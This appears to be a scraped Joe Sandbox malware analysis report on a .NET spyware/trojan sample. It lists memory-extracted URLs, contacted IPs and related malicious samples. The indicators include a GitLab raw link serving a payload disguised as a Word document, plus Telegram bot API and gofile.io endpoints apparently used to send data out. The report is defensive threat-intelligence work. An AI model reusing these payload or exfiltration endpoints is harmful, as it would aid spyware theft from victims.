                                                                http://schemas.xmlsoap.org/wsdl/P%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                  high
                                                                  https://github.com/dotnet/efcorerundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                    high
                                                                    https://gitlab.com/assets/rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/nativeaot-compatibilityP%brundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                        high
                                                                        https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://gitlab.com:443/rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/wsdl/irundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                              high
                                                                              https://aka.ms/nativeaot-compatibilityrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                high
                                                                                http://ip-api.com/json/8.46.123.189rundll32.exe, 00000003.00000002.3141594672.0000022E04DB1000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3141594672.0000022E04D89000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C433981000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C43399D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/serializationformat-binary-obsoleterundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                    high
                                                                                    https://aka.ms/binaryformatterrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                      high
                                                                                      https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falserundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                        high
                                                                                        https://apis.google.comrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://api.telegram.org/botirundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                              high
                                                                                              https://sentry.gitlab.netrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://api.ipify.org:443/rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/Yrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/JamesNK/Newtonsoft.Jsonrundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                      high
                                                                                                      https://www.recaptcha.net/rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.microrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                            high
                                                                                                            https://api.gofile.io/serversYrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/icsharpcode/SharpZipLibrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/mono/linker/issues/1416.rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/P%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                    high
                                                                                                                    https://aka.ms/nativeaot-compatibilityyrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                      high
                                                                                                                      https://new-sentry.gitlab.netrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://aka.ms/dotnet-illink/comrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                          high
                                                                                                                          http://ip-api.com/json/P%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                            high
                                                                                                                            http://james.newtonking.com/projects/jsonrundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/mono/linker/issues/1981rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.catcert.net/verarrelmsedge.exe, 00000005.00000002.1765483938.000037E800110000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1773695210.00002D60000D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerifyrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://gitlab.com/-/sandbox/rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://gitlab.com/admin/rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://customers.gitlab.comrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/mono/linker/issues/1906.rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://gitlab.com/-/speedscope/index.htmlrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://aka.ms/nativeaot-compatibilityYrundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/recaptcha/rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.newtonsoft.com/jsonschemarundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://sourcegraph.comrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/dotnet/linker/issues/2715.rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/dotnet/runtime/issues/50820rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://aka.ms/GlobalizationInvariantModerundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/ericsink/SQLitePCL.rawrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.nuget.org/packages/Newtonsoft.Json.Bsonrundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://api.ipify.orgYrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://urn.to/r/sds_see12https://urn.to/r/sds_see2rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://system.data.sqlite.org/rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.sqlite.org/rescode.htmlrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/mono/linker/issues/1187rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          208.95.112.1
                                                                                                                                                                          ip-api.comUnited States
                                                                                                                                                                          53334TUT-ASUSfalse
                                                                                                                                                                          172.65.251.78
                                                                                                                                                                          gitlab.comUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          172.67.74.152
                                                                                                                                                                          api.ipify.orgUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          IP
                                                                                                                                                                          127.0.0.1
                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                          Analysis ID:1590663
                                                                                                                                                                          Start date and time:2025-01-14 13:11:18 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 11m 7s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:32
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:mP8rzGD7fG.dll
                                                                                                                                                                          (renamed file extension from exe to dll, renamed because original name is a hash value)
                                                                                                                                                                          Original Sample Name:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal84.troj.spyw.evad.winDLL@58/20@4/4
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 93%
                                                                                                                                                                          • Number of executed functions: 10
                                                                                                                                                                          • Number of non-executed functions: 87
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.68, 2.23.242.162, 20.109.210.53, 13.107.253.45
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Execution Graph export aborted for target rundll32.exe, PID 7616 because there are no executed function
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          07:12:18API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                                                                                                                                          07:12:28API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          208.95.112.1iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                          172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          gitlab.comiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          ip-api.comiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          api.ipify.orgiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
